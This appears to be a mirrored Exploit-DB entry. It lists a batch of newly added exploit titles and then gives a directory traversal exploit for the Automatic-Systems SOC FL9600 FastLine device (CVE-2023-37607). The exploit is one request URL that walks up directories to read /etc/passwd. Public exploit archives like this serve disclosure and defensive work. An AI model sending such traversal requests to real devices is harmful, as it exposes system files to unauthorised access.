exploit-db-mirror/exploits/php/webapps/51823.txt
Exploit-DB c1bcfc6347 DB: 2024-02-28
13 changes to exploits/shellcodes/ghdb

TEM Opera Plus FM Family Transmitter 35.45 - Remote Code Execution
TEM Opera Plus FM Family Transmitter 35.45 - XSRF

Executables Created with perl2exe < V30.10C - Arbitrary Code Execution

Atlassian Confluence Data Center and Server - Authentication Bypass (Metasploit)
Automatic-Systems SOC FL9600 FastLine - Directory Transversal
Automatic-Systems SOC FL9600 FastLine - The device contains hardcoded login and password for super admin

dawa-pharma 1.0-2022 - Multiple-SQLi
Moodle 4.3 - Insecure Direct Object Reference
Moodle 4.3 - Reflected XSS

SuperStoreFinder - Multiple Vulnerabilities

Wordpress Plugin Canto < 3.0.5 - Remote File Inclusion (RFI) and Remote Code Execution (RCE)

Zoo Management System 1.0 - Unauthenticated RCE
2024-02-28 00:16:32 +00:00

11 lines
No EOL
442 B
Text

# Exploit Title: Automatic-Systems SOC FL9600 FastLine - Directory Transversal
# Google Dork:
# Date: 12/9/2023
# Exploit Author: Mike Jankowski-Lorek, Marcin Kozlowski / Cqure
# Vendor Homepage: http://automatic-systems.com
# Software Link:
# Version: V06
# Tested on: V06, VersionSVN = 28569_8a99acbd8d7ea09a57d5fbcb435da5427b3f6b8a
# CVE : CVE-2023-37607
Request URL: http://<host>/csvServer.php?getList=1&dir=../../../../etc/&file=passwd